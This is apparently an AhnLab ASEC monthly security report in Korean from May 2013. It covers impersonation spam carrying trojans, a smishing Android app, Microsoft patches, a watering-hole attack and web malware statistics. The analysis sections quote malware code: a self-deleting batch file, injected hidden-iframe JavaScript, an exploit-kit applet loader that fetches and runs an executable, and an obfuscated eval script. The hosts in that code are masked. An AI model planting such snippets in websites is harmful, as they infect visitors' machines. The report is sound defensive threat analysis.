그림 1-48 Bank of America로위장한스팸메일본문해당스팸메일은 Receipt of payment is attached ( 영수증은첨부해드립니다 ) 라는표현을사용해첨부된파일의실행을유도한다. 하지만첨부파일은 zip 파일로된내부에실행파일형태의악성코드를내포하고있었다. 또 This is an automatically generated email, please do not reply ( 이메일은자동으로생성되었으므로, 회신은하지말아주세요 ) 라는표현을이용해진짜알림메일처럼회신금지메시지를표시하고있다. 해당스팸메일의발신인은 inco********aw3@gmail.com이라는구글계정을사용하는것으로파악된다. 첨부파일은 PAYMENT RECEIPT 24-04-2013-GBK-75.zip 라는이름의 zip 압축파일이다. 해당첨부파일을다운로드해압축을풀면, 아래와같이실행파일이생성된다. 실행파일이나아이콘을 PDF 파일과유사하게만들어사용자를혼동시킨다. 아울러파일설명에무작위문자열을사용했다. 만약실제영수증이라면실행파일을발송할이유가없다. 이같은점을미루어보아악성코드를의심할수있다. [ 레지스트리설정 ] 그림 1-51 레지스트리등록항목 1) 악성코드파일을시작프로그램에등록 2) explorer.exe 프로세스에대해방화벽예외설정정책설정 3) UDP를사용하는 11046 포트개방 4) TCP를사용하는 18253 포트개방해당악성코드는추후접속해 PC를제어하기위해방화벽에예외를설정하고포트를개방해놓는다. 일종의봇 (Bot) 으로감염된상태에서 [ 그림 1-52] 와같이원격의시스템으로연결을시도한다. 그림 1-52 악성코드감염시특정 URL로접속시도 그림 1-49 압축해제시생성되는실행파일 이번에발견된악성코드의경우, 방화벽설정을변경해특정포트를개방하기때문에감염되지않는게가장중요하다. 따라서발신인이명확하지않은이메일, 의심스러운링크가포함되어있거나특정파일을실행하도록유도하는이메일에대해서는각별한주의가필요하다. 함부로링크를클릭하거나첨부파일을실행하지않는것이중요하다. 특히영문으로된이메일의경우자신에게해당되는내용의메일인지,
17 아니면스팸으로발송된메시지인지구별해열람하는것이중요하다. Trojan/Win32.Zbot (2013.04.26.01) Trojan/Win32.Zbot (2013.05.02.00) 그림 1-53 레지스트리에등록되는악성코드관련기능 그리고악성코드에감염되면자신을삭제해흔적을제거한다. 미국우편공사 (USPS) 로위장한스팸메일한국의우정사업본부와유사한기관인미국우편공사 (United States Postal Service) 로위장한악성스팸메일이발견됐다. USPS에서발송한것처럼위장하기위해송신자의주소를 reports@usps.com 와같이 USPS의도메인을사칭했고, 수신자가메일에첨부된악성코드를실행하도록유도한다. 메일제목은 USPS delivery failure report 를사용했으며, 수신된메일의본문은첨부된파일 (LABEL- ID-56723547-GFK72.zip) 을출력하도록안내해첨부파일의실행을유도했다. @echo off :d del "C:\Documents and Settings\Administrator\Desktop\ LABEL-ID-56753547-GFK72.exe" if exist "C:\Documents and Settings\Administrator\Desktop\ LABEL-ID-56753547-GFK72.exe" goto d del /F "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ tmpeeade0cd.bat" 악성코드에감염되면독일에위치한것으로확인된원격시스템에연결을반복시도한다. [ 메일본문 ] Notification Our company s courier couldn t make the delivery of package. REASON: Postal code contains an error. LOCATION OF YOUR PARCEL: New York DELIVERY STATUS: sort order SERVICE: One-day Shipping NUMBER OF YOUR PARCEL: 5D61MZ1F2X FEATURES: No Label is enclosed to the letter. Print a label and show it at your post office. An additional information: If the parcel isn t received within 30 working days our company will have the right to claim compensation from you for it s keeping in the amount of $8.26 for each day of keeping of it. You can find the information about the procedure and conditions of parcels keeping in the nearest office. Thank you for using our services. USPS Global. 첨부된파일을실행하면아래와같은파일들이생성된다. 그림 1-54 지속적으로접속을시도하는악성코드악성스팸메일중운송업체를사칭하는악성스팸메일의비중이높은편이다. 특히운송업체를사칭하는방법은오래됐으며동일한방법으로꾸준히지속되고있다. 그것은피해사례가여전히발생하고있다는것을의미한다. 따라서발신인이명확하지않거나파일이나본문에링크가삽입된메일에대해서는사용자의각별한주의가필요하다. Win-Trojan/Agent.297984.AW (2013.04.27.00) UPS 화물운송장으로위장한스팸메일 UPS에서발송한화물배송조회메일로위장한악성스팸메일이발견되었다. 이메일은발신자주소를임의의메일계정으로하여, 악성 html 파일을첨부한상태로불특정다수에게배포된것으로보인다. [ 파일생성 ] C:\Documents and Settings\Administrator\Application Data\ Akta\ixyzs.exe 또한레지스트리에특정값을등록해방화벽을우회하고부팅시자동으로실행될수있도록한다. 그림 1-55 스팸메일에첨부된 html 파일
18 html 파일의링크를클릭하면실제악성코드를유포하는사이트로접속한다. 악성코드유포사이트에서아래와같이플러그인설치여부를묻는창을보여주고, 설치를허용하면악성코드파일을다운로드한다. 외부에서정보를받아오거나, PC에설치되어있는아웃룩의주소록이나편지함등이메일주소를추출할수있는곳의정보를이용해메일을수신하는대상을선정한다. 이와같은메일발송기능은악성코드에감염되었을때항상발생하는증상은아니다. 또한메일이발송되더라도인지하지못하는경우가대부분이다. 그러나회사의네트워크가느려지거나불특정다수에게악성코드가포함된스팸메일을발송해, 추가피해를발생시키는등의여러부작용이있을수있으므로해당악성코드에감염되지않기위한사용자의주의가필요하다. 그림 1-56 악성코드를유포하는웹사이트첨부된파일을실행하면아래와같은파일들이생성되며, 레지스트리에실행파일을등록해부팅시자동으로실행되도록한다. 또한방화벽의허용대상프로그램에자신을등록해, C&C 서버와통신이 PC 보안설정에의해차단되는것을방지한다. 그리고폴더옵션을변경해윈도우탐색기에서보이지않도록설정한다. [ 파일생성 ] C:\Documents and Settings\[login user]\application Data\[ 랜덤폴더 ]\[ 랜덤파일명 ].exe C:\Documents and Settings\[login user]\local Settings\ Temp\4.tmp\msupdate.exe C:\Documents and Settings\[login user]\local Settings\ Temp\4.tmp\PsExec.exe 생성되는파일중에서 PsExec.exe 파일은 MS에서제공하는보안도구로, 동작하고있는시스템에대해서원격에서명령수행이가능하도록해주는기능이있기때문에설치되면추가적인보안사고가발생할위험성이있다. 이툴에대한자세한정보는아래사이트에서확인할수있다. Win-Trojan/Agent.238080.AS (2013.04.27.00) Win-Trojan/Agent.278016.AD (2013.04.27.00) Trojan/Win32.VBKtypt (2013.04.27.00) V3 제품에서는아래와같이진단이가능하다. Win-PUP/Downloader.UtilTop.1895824 Trojan/Win32.OnlineGameHack Trojan/Win32.Scar Spyware/Win32.Agent UPS 택배가도착했습니다유명회사를가장해악성스팸메일을보내악성코드감염을유도하는공격이끊이지않고있다. 이번에발견된건은국제적으로유명한화물운송서비스회사인 UPS로위장해공격을감행한사례다. - http://technet.microsoft.com/ko-kr/sysinternals/bb897553.aspx 원격으로명령을수행해주는프로그램이설치되는경우는악성코드가설치된것보다더큰문제가될수있다. 안티바이러스와같은보안제품들이악성코드로분류하지않기때문에, 악성코드가제거된이후에도악성코드제작자에의해얼마든지장악될수있다. 이번사례에서다룬악성코드의유포자또한 PC의로그인계정정보와같은민감한데이터를이미파악하고있을가능성이높고, 악성코드제작자에의해좀비PC로활용될위험성이있다. 뿐만아니라타인을공격하는등범죄의수단으로악용될수있다. 아래 [ 그림 1-57] 은감염된시스템에서불특정다수에게이메일을발송하는시점의패킷을캡처한것이다. 그림 1-58 악성메일내용 그림 1-57 감염된 PC 에서악성메일발송 메일내용을요약하자면택배가도착했는데수신자의주소를찾을수없는상황이므로, 첨부된파일 ( 악성파일 ) 을확인하고가까운우체국에방문해우편물을찾아가라는내용이다. 물론실제로택배가배달된것
19 은아니며, 첨부파일의압축을해제하면아래와같이 pdf 아이콘으로위장한악성파일이나온다. 03 악성코드동향 그림 1-59 첨부된악성파일악성파일을실행하면추가적으로 loqaal.exe 파일을다운받고, 자동실행레지스트리에등록해주기적으로동작한다. 또한 C&C서버와의통신을위해 windows 기본방화벽에서아래의포트를여는특징이있다. 모바일악성코드이슈 18345:UDP 29372:TCP 악성파일은실행중에아래의다수서버에접속해통신한다. 모바일청첩장으로위장한악성앱발견 최근모바일청첩장으로위장한문자메시지에첨부된링크를통해악성앱이유포되고있다. 이러한스미싱문자는사용자가관심을가질만한다양한내용으로유포되고있어악성앱에쉽게감염될위험이있다. [ 그림 1-61] 은사용자에게발송된모바일청첩장으로위장한스미싱메시지화면이다. 문자메시지의단축 URL을클릭할경우특정 APK 파일 (http://126.***.***.217/danal.apk) 이다운된다. 그림 1-60 다수서버에접속하는악성파일 해당악성코드는 V3 제품에서는아래와같이진단이가능하다. Trojan/Win32.FakeAV (2013.05.24.03) 그림 1-61 모바일청첩장을위장한스미싱문자 악성앱이설치되면다음과같이핸드폰소액결제앱 (Danal) 아이콘을확인할수있다. 그림 1-62 악성앱아이콘
20 해당앱은휴대전화상태, SMS 정보, 네트워크통신, 내장메모리를접근하는수행권한등을사용한다. 그림 1-63 수행권한정보 디컴파일코드를분석해보면휴대전화상태정보를접근하는코드가확인된다. 그림 1-64 디컴파일코드 악성앱을통해수집된정보는아래와같은형식으로특정웹서버 (126.***.***.217) 로전송된다. 그림 1-65 디컴파일코드 분석당시악성앱을유포하고있는서버로연결됐지만, 유출된정보는확인할수없었다. 그림 1-66 서버연결정보 해당악성코드는 V3 Mobile 제품을통해진단및치료가가능하다. Android-Trojan/SMSstealer.67447(2013.05.08.01)
SECURITY TREND 21 01 보안동향 보안통계 5 월마이크로소프트보안업데이트현황 06 07 08 09 10 11 12 01 02 03 04 05 2013년 5월마이크로소프트사에서발표한보안업데이트는총 10건으로긴급 2건, 중요 8건이다. 특히위험도긴급인 MS Explorer 취약점 (MS13-037, MS13-038) 의경우취약점공격코드가공개되어있어, 악의적으로사용될가능성이크므로신속한업데이트가필요하다. 긴급 MS13-037 Internet Explorer용누적보안업데이트 : 2013년 5월 14일 MS13-038 조작된웹페이지를이용한원격코드실행허용문제점중요 MS13-039 HTTP.sys의취약점으로인한서비스거부문제점 MS13-040.Net Framework 취약점으로인한스푸핑문제점 MS13-041 Lync의취약점으로인한원격코드실행문제점 MS13-042 Microsoft Publisher의취약점으로인한원격코드실행문제점 MS13-043 Microsoft Word의취약점으로인한원격코드실행문제점 MS13-044 Microsoft Visio의취약점으로인한정보유출문제점 MS13-045 Windows Essentials의취약점으로인한정보유출문제점 MS13-046 커널모드드라이버의취약점으로인한권한상승문제점 5 4 3 2 1 0 5 4 3 2 1 0 5 4 3 2 1 0 5 4 3 2 1 0 5 4 3 2 1 0 표 2-1 2013 년 5 월주요 MS 보안업데이트 그림 2-1 공격대상기준별 MS 보안업데이트
SECURITY TREND 22 02 보안동향 보안이슈 미정부기관홈페이지를이용한 watering hole 공격보고지난 5월 1일미국노동부 (US Department of Labor) 와미국에너지국 (US Department of Energy) 홈페이지를통해악성코드가배포된것으로알려졌다. 일명 Watering hole 공격으로알려진이번공격은, 2011년 Fortune 500대기업에대한공격을감행했던중국의 DeepPanda 그룹이주도한것으로보고되고있다. 홈페이지에삽입된공격코드는 CVE-2012-4792 취약점 (2012년 12월 30일첫보고 ) 을이용했으며, 윈도우 XP OS에 Internet Explorer 6, 7, 8 버전을사용하는사람들을대상으로하고있다. MS에서는 CVE-2012-4792 취약점에대해올 1월이미보안패치 한취약점이계속적으로발표되고있는상황에서 (CVE-2012-4792, CVE-2013-1347) 윈도우 XP에대한기술지원종료는 XP 사용자들을보안취약점에그대로노출시킬수있다. 더군다나 ATM, POS, 광고용전광판등을비롯한많은산업장비들에서도윈도우 XP가사용되고있다는점에서지난윈도우 XP SP2 기술지원종료때보다더욱많은우려를불러일으키고있다. 하지만윈도우 7 또는윈도우 8 등최근에발표된 OS일수록보안취약점이적다는점에서, 윈도우 XP SP3 종료이후최신버전의 OS로안정적으로정착할경우좀더안전한인터넷환경이이루어질것이라는점에서는긍정적인기대도있다. (MS13-008) 을배포한바있다. CVE-2012-4792 취약점과더불어, 지난 5월 5일에보고된 CVE-2013-1347(MS13-038) 취약점또한악성익스플로이트킷 (Exploit Kit) 에서사용될가능성이높으므로윈도우 OS 사용자들은최신보안패치를모두적용하는것이안전하다. 심화되는국가간 APT 공격 지난 5 월 6 일미국국방부가제출한보고서에의하면, 미국기업과미 국국가기관등을대상으로한해킹사고의원인으로중국정부와군이지목됐다. 중국정부는이보고서에대해서강력하게반발을하며 MS Windows XP 지원종료 2001년 10월 16일출시한윈도 XP에대한기술지원이오는 2014년 4월 8일로종료된다. 윈도우 XP는아직도 OS 시장점유율의 38% 를차지하고있으며, 국내시장또한 30% 이상의점유율을가지고있는것으로알려져있다. 아직까지도윈도우 XP SP3와 Internet Explorer 8.0 이하버전에대 부인했다. 하지만지난 5월 27일워싱턴포스트지는미국국방과학위원회의비밀보고서에중국해커의공격으로미국의첨단무기시스템에대한설계도가 20건이상유출됐다고보도했다. 전투기와군함, 미사일방어체계등다수의첨단시스템이목록에올랐으며그중가장비싼장비는 2007년에유출된것으로보이는차세대전투기 (F-35) 인것으로보인 다. 중국은이전투기자료를이용해자신들이개발중인스텔스전투기의개발속도가빨라졌다는의혹을받고있다. 중국이외에이란에의한공격도미국하원의원에의해보고됐다. 스턱스넷 (Stuxnet) 이라는악성코드를이용해이란핵시설을마비시켰던사건의배후로의심받는미국이, 이번에는이란에의해공격받고있는것으로보고된것이다. 주타깃은미국전력회사들을위주로한산업기반시스템인것으로알려졌다. 이또한이란정부는부인했다. 출처 : http://thenextweb.com/insider/2013/05/01/windows-8-now-up-to-3-84-marketshare-but-the-windows-platform-loses-overall-as-all-other-versions-decline/
SECURITY TREND 23 심각한리눅스커널취약점패치지난 2년이상존재해왔던리눅스성능카운터서브시스템의취약점 (CVE-2013-2094) 이패치된것으로발표됐다. 로컬계정의사용자가관리자권한을얻을수있는취약점으로 5월 14일에공격코드가발표됐으며, 취약점패치는지난달 4월에있었던리눅스커널업데이트에포함된것으로보인다. 웹호스팅을하거나, 신뢰되지않은사용자가있는시스템의경우본취약점패치를꼭수행해야한다. 각리눅스벤더별패치내역은다음사이트에적혀있는레퍼런스를통해알수있다. http://www.cvedetails.com/cve/cve-2013-2094/
WEB SECURITY TREND 24 01 웹보안동향 웹보안통계 웹사이트악성코드동향안랩의웹브라우저보안서비스인사이트가드 (SiteGuard) 를활용한웹사이트보안통계자료에의하면, 2013년 5월악성코드를배포하는웹사이트를차단한건수는모두 1만 5013건이었다. 악성코드유형은총 272종, 악성코드가발견된도메인은 208개, 악성코드가발견된 URL은 963개로각각집계됐다. 전월과비교해서악성코드유형은다소감소하였으나, 악성코드발견건수, 악성코드가발견된도메인, 악성코드발견된 URL은증가했다. 악성코드배포 URL 차단건수 11,821 15,013 04 05 +27.0% 악성코드유형악성코드가발견된도메인악성코드가발견된 URL Graph 301 191 654 272 208 963 301 272 208 191 654 963 표 3-1 2013 년 5 월웹사이트보안현황 월별악성코드배포 URL 차단건수 2013년 5월악성코드발견건수는전달의 1만 1821건과비교해 15,000 10,000 7,861 4.9% +3,960 11,821 50.4% + 3,192 15,013 27.0% 127% 수준인 1 만 5013 건이다. 5,000 0 03 04 05 그림 3-1 월별악성코드배포 URL 차단건수변화추이
WEB SECURITY TREND 25 월별악성코드유형 2013년 5월악성코드유형은전달의 301건에비해 90% 수준인 272건이다. 500 250 328 1.5% -27 301 272 8.2% 9.6% -29 0 03 04 05 그림 3-2 월별악성코드유형수변화추이 월별악성코드가발견된도메인 2013년 5월악성코드가발견된도메인은 208건으로, 2013년 4 월의 191건에비해다소증가했 400 300 200 181 33.2% +10 191 5.2% +17 208 8.9% 다. 100 0 03 04 05 그림 3-3 월별악성코드가발견된도메인수변화추이 월별악성코드가발견된 URL 2013년 5월악성코드가발견된 URL은전달의 654건과비교해 147% 수준인 963건이다. 1,000 500 783 13.9% -129 654 16.5% +309 963 47.0% 0 03 04 05 그림 3-4 월별악성코드가발견된 URL 수변화추이
WEB SECURITY TREND 26 악성코드유형별배포수악성코드유형별배포수를보면트로이목마가 4759건 (31.7%) 으로가장많았고, 스파이웨어가 4038건 (26.9%) 인것으로조사됐다. 유형 건수 비율 TROJAN 4,759 31.7 % SPYWARE 4,038 26.9 % ADWARE 3,548 23.6 % DOWNLOADER 277 1.8 % DROPPER 89 0.6 % Win32/VIRUT 41 0.3 % APPCARE 11 0.1 % JOKE 2 0 % ETC 2,248 15.0 % TOTAL 15,013 100.0% 표 3-2 악성코드유형별배포수 TROJAN 4,759 SPYWARE 4,038 5,000 ADWARE 3,548 ETC 2,248 2,500 DOWNLOADER 277 DROPPER 89 Win32/VIRUT 41 APPCARE 11 JOKE 2 0 그림 3-5 악성코드유형별배포수 악성코드최다배포수악성코드배포최다 10 건중에서 Win-Spyware/ Agent.544453이 4004건으로 1위를차지했으며, Win- Spyware/Agent.544453 등 5건이새로등장했다. 순위 등락 악성코드명 건수 비율 1 NEW Win-Spyware/Agent.544453 4,004 34.1 % 2 8 Adware/Win32.StartPage 2,762 23.6 % 3 NEW Trojan/Win32.MalPacked 1,012 8.6 % 4 NEW Trojan/Win32.Agent 943 8.0 % 5 3 TextImage/Viking 832 7.0 % 6 5 Trojan/Win32.KorAd 628 5.4 % 7 NEW Win-Trojan/ASD.variant 493 4.2 % 8 2 Adware/Win32.Clicker 393 3.4 % 9 4 ALS/Bursted 384 3.3 % 10 NEW Win-Trojan/Agent.25088.YQ 276 2.4 % TOTAL 11,727 100.0 % 표 3-3 악성코드배포최다 10 건
WEB SECURITY TREND 27 02 웹보안동향 웹보안이슈 사이트배너광고, 과연안전한가? 악성코드제작자는자신이제작한악성코드를가능한광범위하게유포하기위해일반적으로직접취약한사이트를찾아서해킹한후악성코드를업로드하는방식을사용하지만이방식은효율성측면에서따져보면효율적이지못하다. 그렇다면악성코드제작자가원하는목적 ( 개인정보, 인터넷뱅킹정보탈취등 ) 을달성하기위해서악성코드를광범위하게유포하려면어떤효율적인방법이있을까? 배너광고를제공하는사이트를해킹한후악성코드 ( 악성코드를다운로드할수있는링크 ) 를삽입하는방법은효율성측면에서가장좋은방법중하나일것이다. 악성코드제작자가배너광고를해킹한후악성코드를삽입했다고가정해보자. 이를모르는일반사이트들은해당배너광고를자신의사이트에링크함으로써순식간에악성코드유포지로둔갑할수있다. 자신의사이트가취약하지않음에도단지배너광고하나로악성코드유포지가되는것이다. 지난 5월발견된악성코드유포사이트들의경로를살펴보면그중에일부사이트가위에서언급한것처럼배너광고를통해서악성코드가유포됐음을확인할수있었고이를그림으로도식화해보면 [ 그림 3-6] 과같다. (1) 언론사사례 : get_bringback.js 언론사사이트에링크된 get_bringback.js에는아래와같은코드가삽입돼있다. if(document.cookie.indexof('ralrlea')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000) ;document.cookie='ralrlea=yes;path=/;expires='+expires. togmtstring();document.write("<iframe width=100 height=0 frameborder=0 src=http://www.**********.co.kr/_data/content/ score_box.html></iframe>");} (2) 웹하드사례 : get_kdisk_bringback.js?_=1369964785811 웹하드사이트에링크된 get_kdisk_bringback.js에는아래와같은코드가삽입돼있다. if(document.cookie.indexof('ralrlea')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000) ;document.cookie='ralrlea=yes;path=/;expires='+expires. togmtstring();document.write("<iframe width=100 height=0 frameborder=0 src=http://www.********.com/akek/personal_ if.html></iframe>");} 위에서살펴본언론사, 웹하드사이트에제공된배너광고는한배너사이트로부터제공됐으며, 삽입된악성코드는 URL( 파란색으로표시된부분 ) 만다를뿐동일한코드임을알수있다. 실제악성코드인 score_box.html, personal_if.html는국내악성코드유포사이트에서자주접할수있는공다익스플로이트킷 (Gongda Exploit Kit) 으로제작됐다. 그림 3-6 배너광고를통한악성코드유포사례 그림 3-7 공다익스플로이트킷으로제작된 score_box.html, personal_if.html
WEB SECURITY TREND 28 위 [ 그림 3-7] 에서보는것처럼해당악성코드들을분석해보면자바취약점 6개, 플래시플레이어 1개, IE 1개등총 8개의취약점을사용해 pc.exe를다운로드및실행한다. 아래코드는해당악성코드들이사용하는 Java 취약점인 CVE-2013-0422를이용해 pc.exe를다운로드하는코드다. www.*******music.com/r.gif) 에서악성코드를다운로드한후실행한다. r.gif는특정온라인게임사용자의아이템을탈취해현금화가기위한목적을가진트로이목마다. gondad.archive="qikrwpa5.jpg"; gondad.code="xml20130422.xml20130422.class"; gondad.setattribute("xiaomaolv","http://admin.**********.co.kr/ pc.exe"); gondad.setattribute("bn","woyouyizhixiaomaolv"); gondad.setattribute("si","conglaiyebuqi"); gondad.setattribute("bs","748"); document.body.appendchild(gondad); 소셜댓글서비스를통한악성코드유포소셜댓글서비스는 SNS와접목한것으로기업, 언론사, 기관등에서 SNS 사용자들에게마케팅또는의견청취를위해사용하고있다. 5월에는특정소셜댓글서비스를제공하는사이트가해킹되어악성스크립트가삽입된일이발생해해당소셜댓글서비스를이용하는사이트들은악성코드를유포사이트로인식됐다. http://****lk.***ckple.com/js/***lk.js에아래와같이난독화된악성스크립트가삽입돼있었다. 그당시패킷로그를보면취업포털사이트는아래처럼외부사이트에서특정 php파일을불러옴을알수있다. eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''. replace(/^/,string)){while(c--){d[c]=k[c] c}k=[function(e) {return d[e]}];e=function(){return'\\w+'};c=1};while(c--) {if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\ b','g'),k[c])}}return p}('4(3.8.25(\'10\')==-1){13 2=9 23();2.26(2.27()+24*15*15*29*7);3.8=\'10=28;22=/;2< --- 중간생략--- 39"+"38=0></4"+"37"+"14>")}}',10,47,' expires document if cooki e new naver1_ad java var me 60 ActiveXObject isinstalled i write JavaWebStart path Date indexof settime gettime Yes 1000 tog MTString fra html tice no wi dth ra ight he sr popup ht c tp 75 51'. split(' '),0,{})) 위난독화된코드는 http://175.***.51.***/popup/notice.html를다운로드하도록되어있으며, notice.html은국내에서가장많이사용하는공다익스플로이트킷으로난독화된스크립트다. 접속한 PC 에서 IE, 자바, 플래시플레이어등을사용하고있고해당프로그램들중에하나에취약점이존재한다면최종으로특정사이트 (http://
ASEC REPORT CONTRIBUTORS 집필진 선임연구원 안창용 선임연구원 이도현 선임연구원 이영수 주임연구원 문영조 주임연구원 김재홍 연구원 강민철 대리 황선욱 참여연구원 ASEC 연구원 편집 안랩세일즈마케팅팀 디자인 안랩 UX 디자인팀 감수전무조시행 발행처 주식회사안랩경기도성남시분당구삼평동 673 ( 경기도성남시분당구판교역로 220) T. 031-722-8000 F. 031-722-8901 Disclosure to or reproduction for others without the specific written authorization of AhnLab is prohibited. 2013 AhnLab, Inc. All rights reserved.